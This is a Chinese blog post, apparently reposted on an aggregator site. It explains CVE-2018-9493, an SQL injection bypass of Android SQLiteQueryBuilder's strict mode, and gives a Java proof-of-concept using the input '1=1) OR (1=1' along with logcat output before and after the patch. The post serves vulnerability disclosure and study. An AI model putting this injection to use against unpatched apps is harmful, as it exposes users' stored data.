SQLiteQueryBuilder 与 CVE-2018-9493

Posted seebigsea

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLiteQueryBuilder 与 CVE-2018-9493相关的知识,希望对你有一定的参考价值。

安全隐患(SQL注入导致数据泄露):http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9493

 

SQLiteQueryBuilder是android中用来构建复杂查询SQL的类,在开启安全检查(android.database.sqlite.SQLiteQueryBuilder.setStrict())后会对SQL的Where条件添加额外的“()”以防止恶意SQL注入。

其工作的思路很简单,用加了额外“()”的SQL来编译(prepare()),如果编译顺利(没有语法错),就接着编译、执行原始SQL以获取数据结果。

但是这个思路有个缺陷,如果攻击者有机会恶意拼接Where条件,用类似“1=1) OR (1=1”这样的输入,因为输入中也包含了“()”,可以让开启setStrict后的两种SQL均编译顺利通过,但是Where条件的含义却被篡改了。

 

验证程序:

    private void testQueryBuilder() {
        Log.i(TAG,"Begin testQueryBuilder...");
        android.database.sqlite.SQLiteDatabase         adb = android.database.sqlite.SQLiteDatabase.openOrCreateDatabase("/data/data/just.justdbdemo/t.db", null);
        android.database.sqlite.SQLiteQueryBuilder     sqb = new android.database.sqlite.SQLiteQueryBuilder();
        sqb.setTables("sqlite_master");
        sqb.setStrict(true);
        sqb.appendWhere("sql !=‘sql‘");
        Cursor csr = sqb.query(adb, new String[]{"name, sql"}, "1=1) OR (1=1", null, null, null, null);
        Log.i(TAG, "csr.getCount() = " + csr.getCount());
        csr.close();
        adb.close();
        Log.i(TAG,"End of testQueryBuilder...");
    }

输出结果:

android.database.sqlite.SQLiteQueryBuilder.setStrict(false);

01-07 13:25:25.465: D/SQLiteConnection(1149): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)"
01-07 13:25:25.475: D/SQLiteConnection(1149): executeForCursorWindow took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)", window=/data/data/just.justdbdemo/t.db {2a150a58}, startPos=0, actualPos=0, filledRows=1, countedRows=1
01-07 13:25:25.475: I/Just DB test(1149): csr.getCount() = 1

----------------------------------------------------------------------------------------------------- android.
database.sqlite.SQLiteQueryBuilder.setStrict(true); 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))" 01-07 13:27:06.645: D/SQLiteConnection(1199): prepare took 3ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)" 01-07 13:27:06.655: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)", window=/data/data/just.justdbdemo/t.db {2a147798}, startPos=0, actualPos=0, filledRows=1, countedRows=1 01-07 13:27:06.655: I/Just DB test(1199): csr.getCount() = 1 打上补丁之后 01-07 13:28:30.135: D/SQLiteConnection(1199): prepare took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))" 01-07 13:28:30.165: D/SQLiteConnection(1199): prepare took 2ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND (1=1) OR (1=1)" 01-07 13:28:30.195: D/SQLiteConnection(1199): executeForCursorWindow took 1ms - succeeded, sql="SELECT name, sql FROM sqlite_master WHERE (sql !=sql) AND ((1=1) OR (1=1))", window=/data/data/just.justdbdemo/t.db {2a155a58}, startPos=0, actualPos=0, filledRows=0, countedRows=0 01-07 13:28:30.195: I/Just DB test(1199): csr.getCount() = 0

 


以上是关于SQLiteQueryBuilder 与 CVE-2018-9493的主要内容,如果未能解决你的问题,请参考以下文章

开源软件CVE_Search的配置与使用(详细)

CVE-2019-14287漏洞与修复过程

揭开CVE漏洞挖掘与编号申请那层神秘窗户纸

揭开CVE漏洞挖掘与编号申请那层神秘窗户纸

Treck TCP/IP协议库“Ripple20”漏洞通告与说明

《漏洞战争》-CVE-2010-3333(上)